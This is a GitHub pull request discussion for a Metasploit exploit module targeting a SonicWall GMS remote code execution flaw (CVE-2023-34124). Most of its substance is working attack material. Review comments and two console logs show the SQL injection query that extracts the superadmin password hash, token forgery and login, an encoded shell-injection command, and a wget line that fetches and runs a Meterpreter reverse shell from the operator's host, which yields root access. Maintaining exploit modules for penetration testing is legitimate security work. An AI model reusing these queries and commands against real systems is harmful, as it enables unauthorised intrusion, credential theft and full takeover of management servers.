-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Sonicwall rce CVE-2023-34124 #18302
Sonicwall rce CVE-2023-34124 #18302
Conversation
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
Thanks for having a look, @jvoisin! I think I've addressed everything you suggested! |
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
have anyone came up with any checker/mas scanner for this ? |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @rbowes-r7 for this great module! I left a few minor comments and suggestions before it lands. I tested version 9.3.9320 and it works great on both Linux and Windows. Thank you for helping me with the software installation.
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
# If there's no ':' in the response, something super weird happened | ||
fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':') | ||
|
||
username, hash = hash.split(/:/, 2) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I don't think regex is needed here. A simple character will avoid unnecessary regex processing.
username, hash = hash.split(/:/, 2) | |
username, hash = hash.split(':', 2) |
documentation/modules/exploit/multi/http/sonicwall_shell_injection_cve_2023_34124.md
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
when :cmd | ||
my_payload = payload.encoded | ||
when :dropper | ||
my_payload = generate_payload_exe(code: payload.encoded) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It looks like payload.encoded
is the default payload in generate_payload_exe
.
metasploit-framework/lib/msf/core/exploit/exe.rb
Lines 65 to 66 in 28ba19a
pl = opts[:code] | |
pl ||= payload.encoded |
my_payload = generate_payload_exe(code: payload.encoded) | |
my_payload = generate_payload_exe |
'==== | uudecode;', | ||
|
||
# Run in the background with coproc | ||
"coproc #{Shellwords.escape(payload_file)};", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I was surprised this works for both ELF and shell script, since execute_command_linux
can receive an executable as raw binary or a shell script. If a shell script is received, the resulting temporary file created on the target will be a text file containing the command without shebang line. Since it is chmod'ed as executable, the parent shell seems to guess it is a shell script and execute it with /bin/sh
. That's cool!
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yup! Super handy, thanks Linux!
I could maybe do "bash " to be safe, but /shrug
'PAYLOAD' => 'cmd/unix/generic', | ||
'DisablePayloadHandler' => true |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm wondering if there is any reason to disable the payload handler?
On my test environment (Linux VM Appliance with SonicWall GMS 9.3.9320), wget
is available, which let me use a fetch payload:
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.19 verbose=true fetch_srvhost=192.168.100.19 fetch_command=WGET
[*] Command to run on remote host: wget -qO ./QhmRCknzxk http://192.168.100.19:8080/aWXHuJn0-w7Npfyk2zEaeQ; chmod +x ./QhmRCknzxk; ./QhmRCknzxk &
[*] Fetch Handler listening on 192.168.100.19:8080
[*] HTTP server started
[*] Adding resource /aWXHuJn0-w7Npfyk2zEaeQ
[*] Started reverse TCP handler on 192.168.100.19:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 92398446593864970646036091413420
[*] Generated client token: 611e94991eef3d3bb5e586070836a7a8
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.wlwfbnum\\\\nd2dldCAtc8gLi9RaG1S2tuenhrIGhdHA6Ly8xOIuMTY4LjEMTk6ODA4MC9hV1pFYWVROyBaG1vZCAreCAus7IC4vUWhtUkNbnpm\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.wlwfbnum\;rm\ /tmp/.wlwfbnum
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /aWXHuJn0-w7Npfyk2zEaeQ
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 7 opened (192.168.100.19:4444 -> 192.168.100.43:55231) at 2023-08-31 11:30:00 +0200
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : gms.example.com
OS : (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > [*] Shutting down Meterpreter...
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
what could be the reason for this?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There could be a lot of reasons for this. This can be an AV running on the target that blocks the payload execution, the software is patched and not vulnerable anymore, the payload simply needs some local tool to run properly (e.g. wget
, curl
, etc.), the handler is not running on the Metasploit side, a firewall is blocking somewhere, etc.
Please, can you give more details?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi
thank you for answering
what detail is needed?
so i can give
i run the exploit
give it the lhost , rhost
it workes fine till the end that gives no session
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
[] Command to run on remote host: wget -qO ./SfaBnzTq http://192.168.100.120:8080/_Ysce7IWY9BXUC2Go0wjXg; chmod +x ./SfaBnzTq; ./SfaBnzTq &
[] Fetch Handler listening on 192.168.100.120:8080
[] HTTP server started
[] Adding resource /_Ysce7IWY9BXUC2Go0wjXg
[] Started reverse TCP handler on 192.168.100.120:4444
[] Attempting to use SQL injection to grab the password hash for the superadmin user...
[] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:4e91d12e61259fed5d485f38e71da4be
[] Grabbing server hashing token...
[] Got the server-side token: 08178100102648407989985416008201
[] Generated client token: 5f33490baf0bed3a8c3061e3b879e334
[] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[] Encoding (Linux) payload
[] Encoded shell command: bash -c PLUS=$(echo\ -e\ begin-base64\ 755\ a\\nKwee\\n====\ |\ uudecode\ -o-);echo\ -e\ begin-base64\ 755\ /tmp/.lcsqpuat\\nd2dldCAtcU8gLi9TZmFCbnpUcSBodHRwOi8vMTkyLjE2OC4xMDAuMTIwOjgwODAvX1lzY2U3SVdZOUJYVUMyR28wd2pYZzsgY2htb2QgK3ggLi9TZmFCbnpUcTsgLi9TZmFCbnpUcSAm\\n====\ |\ uudecode\ ;\ coproc\ /tmp/.lcsqpuat\ ;\ rm\ /tmp/.lcsqpuat
[] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Re: the original thing, I figured generic/command
wouldn't necessarily want a handler. I don't feel strongly, though, so I went ahead and removed that
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
Outdated
Show resolved
Hide resolved
Thanks @rbowes-r7 ! Everything looks good to me now. I tested against version 9.3.9320 on Linux and Windows and verified I got a session. I'll go ahead and land it. Example outputLinux
Windows
|
Release NotesThis adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124. |
Add a module for a remote code execution issue in SonicWall GMS. This works by exploiting several different issues fixed in the same patch, culminating in shell injection. One of the biggest difficulties was getting past their XSS filter, which takes exception to a lot of special characters. Both the Windows and Linux versions should be able to encode/run any command that's not too long.
Verification
The affected software is SonicWall GMS 9.3.9320 (and likely earlier). The first patched version is 9.3.9330. They should be available in the "vulnerable software" folder, but need to be linked to a (free) SonicWall account + demo license. I documented how to get those going in the
documentation/
entry.This should work against both the Windows version (which is a .exe installer), and a Linux version (which is a VM appliance, which, AFAICT, they don't give you a login for, or at least not one I could find).
Once the software is installed:
msfconsole
use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
TARGET
,RHOST
,LHOST
, and possiblyFETCH_SRVHOST
(for Windows)run
Happy to help with running the software or testing the modules!